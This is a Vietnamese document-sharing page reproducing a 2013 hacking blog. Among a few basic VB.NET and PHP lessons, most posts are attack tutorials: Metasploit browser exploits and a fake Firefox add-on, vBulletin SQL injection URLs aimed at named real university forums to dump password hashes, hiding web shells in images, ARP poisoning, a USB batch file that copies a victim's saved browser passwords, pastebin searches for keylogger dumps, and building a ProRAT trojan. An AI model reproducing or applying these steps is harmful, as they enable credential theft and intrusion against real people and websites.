1. Trang chủ
  2. » Công Nghệ Thông Tin

phishing addon firefox bằng backtrack

25 492 1
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Phishing Addon Firefox Bằng Backtrack
Tác giả Bang Tuyet
Trường học Unknown
Chuyên ngành Computer Science
Thể loại Bài viết
Năm xuất bản 2013
Thành phố Unknown
Định dạng
Số trang 25
Dung lượng 1,13 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Kĩ thuật này dùng để giả mạo addon firefox ,sau đó mở cổng mà có thể connect vào máy tính,có tác dụng trên mọi phiên bản win và firefox.Đầu tiên mở terminal của Backtrack lêntype: msfupd

Trang 1

Kĩ thuật này dùng để giả mạo addon firefox ,sau đó mở cổng mà có thể connect vào máy tính,có tác dụng trên mọi phiên bản win và firefox.Đầu tiên mở terminal của Backtrack lên

type: msfupdate nếu chưa update exploit

type: msfconsole

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 23:02 1 nhận xét:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Visual Basic căn bản

VB.net là ngôn ngữ lập trình hướng đối tượng bậc cao.Theo mình đây là một ngôn ngữ rất mạch lạc ,dễ học và dễ nhớ.Chú ý là kiến thức mình học được đều là tự học,qua mạng,bạn bè.Không từ bất kì thầy cô nào,nên đôi khi một

số điều mình hiểu ko đúng 100% Có gì sai mong ai biết góp ý để mình hoàn thiện kiến thức

Bài 1:Cấu trúc vb.net và khai báo biến.

Đầu tiên để làm quen với cấu trúc lệnh ta thực thi các ví dụ trên Console application cho dễ nhìn

Cấu trúc của Vb.net đc miêu ta như sau

Public/Private Function/Sub Tên(Biến tham chiếu hoặc tham trị)

Dim bien_1 As Kiểu_biến_1 'khai bao bien

Dim bien_2 As Kiểu_biến_2

Trang 2

Module Module1

Sub Main()

Dim a As Integer 'khai báo biến a là kiểu integer

Console.WriteLine("nhập giá trị a")

a = Integer.Parse(Console.ReadLine())

Dim result As Integer = Chuongtrinh(a)

Console.Write("gia tri binh phuong cua bien a:")

Ví dụ như ta nhập vào là 3 thì kết quả in ra là > gia tri binh phuong cua bien a:9

Ta dùng Console.ReadKey() để tạm dừng chương trình mà xem kết quả.Nếu như ko có câu lệnh này thì chạy xong

nó tắt luôn.Ta chưa kịp nhìn thấy gì cả

Như ví dụ trên thì ta thấy có thể viết ra màn hình bằng 2 lệnh Console.Write() và Console.WriteLine()

2 cái này nó khác nhau ở chỗ 1 cái in ra ở trên cùng một dòng và một cái in ra xong nó xuống dòng.Tương tự điều này cho Console.Read() và Console.ReadLine()

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 13:40 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ sáu, ngày 25 tháng một năm 2013

Căn Bản PHP

Hiện nay nó khá nhiều ngôn ngữ viết web như asp,perl,php Mình định viết tất cả cho mọi người.Bài đầu tiên mìnhviết căn bản về lập trình PHP.Đây là 1 ngôn ngữ khá phổ biến.Rất nhiều mã nguồn đc viết bằng php.Bao nhiêu phầntrăm thì mình không rõ.Nhưng đa số là php rồi

Để chạy đc file php thì mọi người có khá nhiều cách,cài localhost ,hay kiếm 1 cái host nào đấy,vất lên là chạy thôi

Bài 1.

Chương trình php đầu tiên :

Php có thể dễ dàng chèn vào nội dung của file html,hoặc có thể sinh ra mã html luôn

lưu lại demo.php cho lên host ta sẽ nhận đc ->đây là mã php đầu tiên của chúng ta

Có thêm 1 số cách khai báo mã php

ví dụ như dạng script

Trang 3

Được đăng bởi Bang Tuyet vào lúc 20:38 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ tư, ngày 16 tháng một năm 2013

hack forum với metod dnn

tìm các forum lỗi với dork chính sau

inurl:/portals/0/default.aspx

inurl:/tabid/36/language/en-US/Default.aspx

Mình tùy biến đi để có dork cho site việt nam nhé

inurl:"/portals/0? site: vn

Trang 4

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 13:52 1 nhận xét:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Trang 5

exploit vbulletin với thông qua backup

Khi tạo backup,đôi khi database đc lưu trong thư mục backup ,thông qua việc này ta dùng dork hợp lí để lấy database đó về,lấy pass và login nhé

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDwQFjAC&url=http%3A%2F

%2Fwww.decoratingforum.com.au%2Fbackups%2Fforumbackup-18-09-2009-

ceae8.sql&ei=tQ_3UIe7FMnc4QSRiIDQAg&usg=AFQjCNF7zSIWPRH-CJSRLFJpNbjrecSF_Q&sig2=CltQlV16h5vyh7J8dlAd3A&bvm=bv.41018144,d.bGE&cad=rja

Được đăng bởi Bang Tuyet vào lúc 12:39 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ hai, ngày 14 tháng một năm 2013

=>> có 10 cột từ 0-9 Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 04:48 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ bảy, ngày 12 tháng một năm 2013

[TUT] Uploading Shell Without Getting into Admin Panel [leech]

Trang 6

[TUT] Uploading Shell Without Getting into Admin Panel

I see lot of people SQL injecting and trying their hard luck to get in admin panel to upload a shell.

This Tutorial is not N00b friendly If you use Tools for SQL injection don't bother reading this

Usually you can exec this command if you have access to table

example : - 1 union all select load_file('filetoload'),2,3,4,5,6 from

mysql.users Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 15:10 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Chèn code shell vào ảnh dùng backtrack

Upload shell là 1 khâu rất là quan trọng trong local đúng hem nè,mà nhiều site nó chặn việc upload php,chỉ cho up ảnh,do đó tạo 1 con shell cái mà xem như 1 ảnh để ta up lên là 1 điều cần làm.Shell ảnh thì nhiều nguời có ùi,giờ mình chỉ làm cách tạo nó thui,sp có bảo là có thể tạo bằng photoshop,nhưng cách này của sp có vẻ dễ hơn,từ nay ta

có thể tạo bất kì con shell bằng file ảnh nhé

Dùng icon2php

download ở đây,

đem về giải nén ra desktop nha (dùng unrar x iCon2PHP.rar)

giải nén ra ta đc thư mục iCon2PHP

cd iCon2PHP

chạy tiếp lệnh python iCon2PHP.py nhé

nó sẽ hiện lên 2 đường dẫn,đường dẫn đầu là đường dẫn file ảnh cần chén code,đường dẫn sau là đường dẫn shell.sau đây mình add con r57.php vào capuchino.jpg nhé

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 14:30 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ sáu, ngày 11 tháng một năm 2013

WordPress Gallery 3.8.3 Arbitrary File Read [leech]

Trang 7

Được đăng bởi Bang Tuyet vào lúc 16:52 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Cracking SHA 256 and SHA 512 linux/unix passwords

If you’ve ever tried to crack passwords from a new ubuntu or other new linux’s, you may have noticed that John TheRipper cannot crack the hashes starting with $5$ or $6$

I had 2 passwords i needed to check The passwords came from /etc/shadow from a newer Ubuntu version and i didnt even notice that the hash started with $6$ instead of the usual $1$ After searching and reading for a while, i found out that this is simply the newest generation of password hashes for linux The “normal” hash ($1$) is MD5 The new ones are $5$ and $6$ and are SHA256 and SHA512 respectively

The implementation of SHA passwords in linux is done by Ulrich Drepper at RedHat and his original paper can be found here

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 13:31 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Các loaị mã hóa

1.MySQL có 2 loại

60671c896665c3fa MySQL loại 16 kí tự

Trang 8

667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự

7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự

hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 13:17 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ ba, ngày 08 tháng một năm 2013

Thêm 1 số exploit vbulletin

Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability

Trang 9

Được đăng bởi Bang Tuyet vào lúc 15:23 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Tiếp tục exploit vBulletin với Awards System 4.0.2+ SQL

Injection

dork thì sáng tạo ra nha

Ở đây mình dùng dork: inurl:request_award.php Powered by vBulletin® Version 4.0.2

vào site victim với dạng victim.com/request_award.php

Khai thác bằng thêm data với cấu trúc như sau ,có thể dùng addon hackbar nha

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 15:00 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Exploit 4.0.x bằng perl cho newbie

Chạy perl xong

Tạo file perl với nội dung

Trang 10

use IO::Socket;

print q{

#######################################################################

# vBulletin? Version 4.0.1 Remote SQL Injection Exploit #

# By th3.g4m3_0v3r #

# our Site www.h4ck3r.in #

# www.hackingcrackingtricks.blogspot.com #

# Indian (th3.g4m3_0v3r@yahoo.com) #

# Dork: Powered by vBulletin? Version 4.0.1 #

Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 14:31 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook Tiếp Tục Phần Khai Thác Vbulletin [sql trên shoutbox] 2 bài trứoc viết về vbb,tiếp tục mình viết nốt mấy bug còn lại ,bài này là lỗi sql trên shoutbox dork khai thác :inurl:infernoshout.php ra một số trang thêm vào đuôi victim tìm đc đoạn như sau victim.com/folder/infernoshout.php?do=options&area=commands Mình demo trên http://bien19.biz/forum/infernoshout.php?do=options&area=commands hiện ra như sau Như thấy nó hiện ra 4 khung,khung đầu nhập vào đoạn query là Đọc thêm » Được đăng bởi Bang Tuyet vào lúc 13:50 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ hai, ngày 07 tháng một năm 2013

vbulletin CSRF attack - Add plugin & Upload shell

Trang 11

Vì ko có quyền smod của trang nào nên ko demo đc,search trên youtube cho ai quan tâm.

http://www.youtube.com/watch?feature=player_embedded&v=0W8KWdiHzCI

Tìm đc cách fix luôn ,từ sinhvienit

Đây là cách đơn giản nhất là bạn đổi thư mục AdminCP và không tiết lộ thư mục AdminCP mới cho bất kỳ ai biết

Sau khi đổi nhớ sửa lại tên thư mục admin trong file config.php ở phần

PHP Code:

$config['Misc']['admincpdir']

Tuy nhiên, khi sử dụng cách này thì sẽ có thể gây ra 1 số mod có phần admincp hoạt động sai hoặc ko hoạt động Nên khi dùng cách này các bạn cần lưu ý.

Được đăng bởi Bang Tuyet vào lúc 16:21 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Check sqlinjection vbulletin mod chang stats

Lỗi cổ rồi viết lại cho ai chưa biết

Trang 12

Khoa tài chính - Kế tóan -Đại học sài gòn :http://fafsgu.vn/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!50000unION*/+/*!50000seLECT*/+1,concat_ws%280x2f,userid,password,salt%29,3,4,5,6,7,8,9,10+/*!

Đại học thành đô Hà Nội:http://svthanhdo.com/diendan/ajax.php?do=inforum&listforumid=-20%29+/*!

Được đăng bởi Bang Tuyet vào lúc 16:13 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Chủ nhật, ngày 06 tháng một năm 2013

Attack Win với ARP Cache Poisoning trên Backtrack

Vào Terminal,chỉnh sửa file /etc/etter.conf

Gõ:nano /etc/etter.conf rồi tìm đoạn sau

Trang 13

# if you use iptables:

# redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp dport %$ # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp dport $Sửa lại thành như sau :(bỏ dấu # đi)

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp dport %$ redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp dport $Lưu lại và thoát ra

Tiếp theo ta scan network bằng nnap,ở đây là mạng lan

nmap -sP 192.168.40.1/24

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 15:07 1 nhận xét:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Sniffing dùng Ettercap Trên Backtrack 5

Sniffing là gì nếu ai chưa biết thì dùng google nhá

Bước 1:Mở terminal

Bước 2:Gõ lệnh ettercap -G

Hiện ra như sau

Trang 14

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 11:23 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Exploit win 8 với Backtrack 5

Lần trứoc chúng ta đã biết cách attack win xp và win 7 link dùng browser autopwn với backtrack 5 link here ,còn đối với win 8,hệ điều hành mới đc micro giới thiệu trong thời gian gần đây thì sao.Mình tiện viết luôn bài đối với win 8 nhé

Đầu tiên mở terminal backtrack lên

Gõ:msfconsole

Gõ:use exploit/multi/browser/java_signed_applet

Đọc thêm »

Trang 15

Được đăng bởi Bang Tuyet vào lúc 08:11 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Hơn 3000 dork sql injection

Được đăng bởi Bang Tuyet vào lúc 07:35 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ sáu, ngày 04 tháng một năm 2013

Lấy pass lưu trong firefox,opera,chrome dùng USB

Đầu tiên tải các file sau về http://www.mediafire.com/?3aijmohqomvklsw

tiếp tục copy đoạn code sau đây vào nodepad,lưu lại tên file là file.bat

start PasswordFox.exe /stext firefox.txt

start OperaPassView.exe /stext Opera.txt

start ChromePass.exe /stext Chrome.txt

đặt tất cả các file,cùng với 3 file khi nãy tải về vào usb,ta có thể để vào trong folder nào đó,hoặc cho thêm lẫn nhiều file vào

Sau đó cắm vào máy victim

Rồi tự mình kich vào file.bat hoặc nói với victim là mình muốn check nó hay gì đó,chỉ cần kich vào file.bat thôi nhá

Sau khi kick vào file.bat màn hình sẽ đen 2giây.Lúc này pass đã đc lưu lại vào usb với tên file là firefox.txtopera.txt,chrome.txt

^_^

Được đăng bởi Bang Tuyet vào lúc 08:28 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Đăng nhập administrator trên winxp (Chưa check trên win 7)

Đôi khi ngồi vào 1 máy nào đó,nhưng nó chỉ có quyền user thường,hoặc bị lock màn hình.Nếu ta muốn vào bằng administrator mà ko biết pass thì làm như sau

Trang 16

-Khởi động lại máy tinhs

-Nhấn F8 xuất hiện như sau

Safe mode

Safe mode with networking

Safe mode with command promt

Start windows normally

-Chọn Safe mode ,và màn hình đen xuất hiện,sau đó nó sẽ hiện ra user thường và administrator để bạn chọn đăng nhập vào ,tất nhiên ta chọn administrator để login vào

tiếp tục mở Cmd

Start->Run->CMD

Gõ lệnh net user ,nó sẽ hiện ra các user

gõ tiếp

net user (tên account administrator) *

có space trước dấu * nhé

nó sẽ hiện ra chỗ nhập mật khẩu mới,

nhập và khởi động lại máy là oke

rất là dễ

Được đăng bởi Bang Tuyet vào lúc 05:03 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Tìm password từ các con keylog trên thế giới

Vào trang http://pastebin.com/

tìm khung search bar và nhập vào

Program:firefox Url/Host:http://www.facebook.com login

Được đăng bởi Bang Tuyet vào lúc 04:50 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Trang 17

Sqli với backtrack dùng bộ công cụ Darkmysqli

Victim demo :http://autohoabinh.com/?page=products_detail&id=293&catid=11

Khi ta check http://autohoabinh.com/?page=products_detail&id=293&catid=11"

Được đăng bởi Bang Tuyet vào lúc 02:03 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ năm, ngày 03 tháng một năm 2013

Hacking Remote Computer Using ProRAT

Hacking Remote Computer Using ProRAT

Friends today i'm writting a thread on Hacking Remote PC using ProRat.

Hope you'll find it useful You can also have pictorial tutorial Let's start.

1) First of all Download ProRat

Once it is downloaded right click on the folder and choose to extract it A password prompt will come up The password will be "pro".

2) Open up the program.

3) Next we will create the ProRat Trojan server Click on the "Create" button in the bottom Choose "Create ProRat Server".

4) Next put in your IP address so the server could connect to you If you don’t know your IP address click on the little arrow to have it filled in for you automatically Next put in your e-mail so that when and if a victim gets infected it will send you a message We will not be using the rest of the options.

5) Now Open General settings This tab is the most important tab In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Đọc thêm »

Được đăng bởi Bang Tuyet vào lúc 09:08 Không có nhận xét nào:

Gửi email bài đăng này BlogThis! Chia sẻ lên Twitter Chia sẻ lên Facebook

Thứ tư, ngày 02 tháng một năm 2013

Ngày đăng: 09/12/2013, 23:33

TỪ KHÓA LIÊN QUAN

w